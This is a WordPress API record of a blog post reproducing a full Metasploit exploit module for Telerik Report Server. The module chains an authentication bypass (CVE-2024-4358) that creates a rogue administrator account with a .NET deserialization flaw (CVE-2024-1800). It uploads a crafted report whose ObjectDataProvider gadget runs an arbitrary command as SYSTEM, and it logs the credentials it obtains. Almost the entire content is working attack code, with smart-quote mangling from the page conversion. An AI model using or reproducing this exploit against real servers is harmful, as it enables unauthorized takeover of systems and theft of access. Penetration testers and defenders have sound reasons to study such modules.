{"id":57467,"date":"2024-06-13T17:31:11","date_gmt":"2024-06-13T14:31:11","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179084\/telerik_report_server_deserialization.rb.txt"},"modified":"2024-06-13T17:31:11","modified_gmt":"2024-06-13T14:31:11","slug":"telerik-report-server-authentication-bypass-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/telerik-report-server-authentication-bypass-remote-code-execution\/","title":{"rendered":"Telerik Report Server Authentication Bypass \/ Remote Code Execution"},"content":{"rendered":"

# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework<\/p>\n

require ‘rex\/zip’<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::CheckModule
include Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Telerik Report Server Auth Bypass and Deserialization RCE’,
‘Description’ => %q{
This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability
(CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.
The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.
The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a
new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an
OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account
because users are unable to delete themselves.
},
‘Author’ => [
‘SinSinology’, # CVE-2024-4358 discovery, original PoC and vulnerability write-up
‘Soroush Dalili’, # CVE-2024-1800 exploitation assistance
‘Unknown’, # CVE-2024-1800 discovery
‘Spencer McIntyre’ # MSF module
],
‘License’ => MSF_LICENSE,
‘References’ => [
[ ‘CVE’, ‘2024-1800’ ], # .NET deserialization vulnerability # patched in > 10.0.24.130
[ ‘CVE’, ‘2024-4358’ ], # Authentication bypass # patched in > 10.0.24.305
[ ‘URL’, ‘https:\/\/summoning.team\/blog\/progress-report-server-rce-cve-2024-4358-cve-2024-1800\/’ ]],
‘Platform’ => ‘win’,
‘Arch’ => ARCH_CMD,
‘Targets’ => [
[ ‘Automatic’, {} ],
],
‘DefaultOptions’ => {
‘SSL’ => false,
‘RPORT’ => 83
},
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘2024-06-04’,
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE, ],
‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
‘Reliability’ => [ REPEATABLE_SESSION, ],
‘RelatedModules’ => [ check_module ]}
)
)<\/p>\n

register_options([
OptString.new(‘TARGETURI’, [ true, ‘The base path to the web application’, ‘\/’ ]),
OptString.new(‘USERNAME’, [false, ‘Username for the new account’, ”]),
OptString.new(‘PASSWORD’, [false, ‘Password for the new account’, ”])
])
deregister_options(‘CheckModule’)
end<\/p>\n

def check_module
‘auxiliary\/scanner\/http\/telerik_report_server_auth_bypass’
end<\/p>\n

def check_options
{ ‘ACTION’ => ‘CHECK’ }
end<\/p>\n

def check
check_code = super<\/p>\n

if check_code == CheckCode::Appears
# The auth bypass affects later versions than the RCE, so just filter those out
version = check_code.details[:version]if version > Rex::Version.new(‘10.0.24.130’)
return CheckCode::Safe(“Telerik Report Server #{version} is not affected by CVE-2024-1800.”, details: check_code.details)
end
end<\/p>\n

check_code
end<\/p>\n

def username
@username ||= datastore[‘USERNAME’].blank? ? Faker::Internet.username : datastore[‘USERNAME’]end<\/p>\n

def password
@password ||= (create_account? && datastore[‘PASSWORD’].blank?) ? Rex::Text.rand_text_alphanumeric(16) : datastore[‘PASSWORD’]end<\/p>\n

def create_account?
# unless the user specifies a username, use CVE-2024-4358 to create an account for them.
datastore[‘USERNAME’].blank?
end<\/p>\n

def create_account!
# create a new account by exploiting CVE-2024-4358
res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘Startup\/Register’),
‘vars_post’ => {
‘Username’ => username,
‘Password’ => password,
‘ConfirmPassword’ => password,
‘Email’ => Faker::Internet.email(name: username),
‘FirstName’ => Faker::Name.first_name,
‘LastName’ => Faker::Name.last_name
}
)
fail_with(Failure::Unreachable, ‘No response received’) if res.nil?
fail_with(Failure::UnexpectedReply, ‘Failed to create the new account’) unless res.code == 302 && res.headers[‘location’]&.end_with?(‘\/Report\/Index’)
end<\/p>\n

def login
res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘Token’),
‘vars_post’ => {
‘grant_type’ => ‘password’,
‘username’ => username,
‘password’ => password
}
)<\/p>\n

fail_with(Failure::Unreachable, ‘No response received’) if res.nil?
fail_with(Failure::UnexpectedReply, ‘Failed to login to the target (invalid response)’) unless res.headers[‘content-type’]&.start_with?(‘application\/json’)
fail_with(Failure::NoAccess, ‘Failed to login to the target (invalid credentials)’) unless res.code == 200<\/p>\n

access_token = res.get_json_document[‘access_token’]fail_with(Failure::UnexpectedReply, ‘Failed to login to the target (missing access token)’) unless access_token.present?<\/p>\n

print_good(“Successfully authenticated as #{username}”)
report_creds(username, password)
access_token
end<\/p>\n

def build_trdp
zip = Rex::Zip::Archive.new
zip.add_file(
‘[Content_Types].xml’,
Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).to_xml(indent: 0, save_with: 0)
<Types xmlns=”http:\/\/schemas.openxmlformats.org\/package\/2006\/content-types”>
<Default Extension=”xml” ContentType=”application\/zip” \/>
<\/Types>
XML
)
zip.add_file(
‘definition.xml’,
Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
<Report Width=”6.5in” Name=”oooo” xmlns=”http:\/\/schemas.telerik.com\/reporting\/2021\/1.0″>
<Items>
<ResourceDictionary
xmlns=”clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35″
xmlns:System=”clr-namespace:System;assembly:mscorlib”
xmlns:Diag=”clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089″
xmlns:ODP=”clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35″
>
<ODP:ObjectDataProvider MethodName=”Start” >
<ObjectInstance>
<Diag:Process>
<StartInfo>
<Diag:ProcessStartInfo FileName=”cmd” Arguments=#{“\/c #{payload.encoded}”.encode(xml: :attr)}><\/Diag:ProcessStartInfo>
<\/StartInfo>
<\/Diag:Process>
<\/ObjectInstance>
<\/ODP:ObjectDataProvider>
<\/ResourceDictionary>
<\/Items>
<\/Report>
XML
)
zip.pack
end<\/p>\n

def send_request_api(resource, method: nil, data: nil)
if method.nil?
method = data.nil? ? ‘GET’ : ‘POST’
end<\/p>\n

res = send_request_cgi(
‘method’ => method,
‘uri’ => normalize_uri(target_uri.path, ‘api’, resource),
‘headers’ => {
‘Authorization’ => “Bearer #{@access_token}”
},
‘ctype’ => ‘application\/json’,
‘data’ => data.nil? ? nil : data.to_json
)
fail_with(Failure::Unreachable, ‘No API response received’) if res.nil?
fail_with(Failure::UnexpectedReply, “The API responded with status #{res.code}”) unless res.code == 200<\/p>\n

return nil if res.body.blank?<\/p>\n

fail_with(Failure::UnexpectedReply, ‘API response content is not JSON data’) unless res.headers[‘content-type’]&.start_with?(‘application\/json’)<\/p>\n

res.get_json_document
end<\/p>\n

def exploit
if create_account?
print_status(‘Creating a new administrator account using CVE-2024-4358’)
create_account!
print_good(“Created account: #{username}:#{password} (Note: This account will not be deleted by the module)”)
end<\/p>\n

@access_token = login<\/p>\n

categories = send_request_api(‘reportserver\/categories’)<\/p>\n

report_name = rand_text_alphanumeric(10)
category = categories.sample
fail_with(Failure::Unknown, ‘A random category could not be selected’) unless category<\/p>\n

print_status(“Using category: #{category[‘Name’]}”)<\/p>\n

send_request_api(
‘reportserver\/report’,
data: {
‘reportName’ => report_name,
‘categoryName’ => category[‘Name’],
‘description’ => nil,
‘reportContent’ => Rex::Text.encode_base64(build_trdp),
‘extension’ => ‘.trdp’
}
)
vprint_status(“Created report: #{report_name}”)<\/p>\n

res_json = send_request_api(‘reportserver\/reports’)
@report = res_json.find { |report| report[‘Name’] == report_name && report[‘CategoryId’] == category[‘Id’] }<\/p>\n

res_json = send_request_api(
‘reports\/clients’,
data: {
‘timeStamp’ => nil
}
)<\/p>\n

client_id = res_json[‘clientId’]fail_with(Failure::UnexpectedReply, ‘Failed to obtain the client ID’) unless client_id.present?<\/p>\n

begin
send_request_api(
“reports\/clients\/#{client_id}\/parameters”,
data: {
‘report’ => “NAME\/#{category[‘Name’]}\/#{report_name}\/”,
‘parameterValues’ => {}
}
)
rescue Msf::Exploit::Failed => e
raise e unless fail_reason == Failure::UnexpectedReply<\/p>\n

print_good(‘The server responded with an error indicating that the payload was executed’)
self.fail_reason = Failure::None
end
end<\/p>\n

def cleanup
return unless @report && @access_token<\/p>\n

print_status(“Deleting report ‘#{@report[‘Name’]}’ (ID: #{@report[‘Id’]})”)
send_request_api(“reportserver\/reports\/#{@report[‘Id’]}”, method: ‘DELETE’)
end<\/p>\n

def report_creds(user, pass)
credential_data = {
module_fullname: fullname,
username: user,
private_data: pass,
private_type: :password,
workspace_id: myworkspace_id,
last_attempted_at: Time.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_details)<\/p>\n

create_credential_and_login(credential_data)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

# This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework require ‘rex\/zip’ class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheckinclude Msf::Exploit::Remote::CheckModuleinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,‘Name’ => ‘Telerik Report Server Auth Bypass and Deserialization RCE’,‘Description’ => %q{This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability(CVE-2024-1800) to obtain remote code execution against Telerik Report …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57467","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57467","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57467"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57467\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57467"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57467"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57467"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}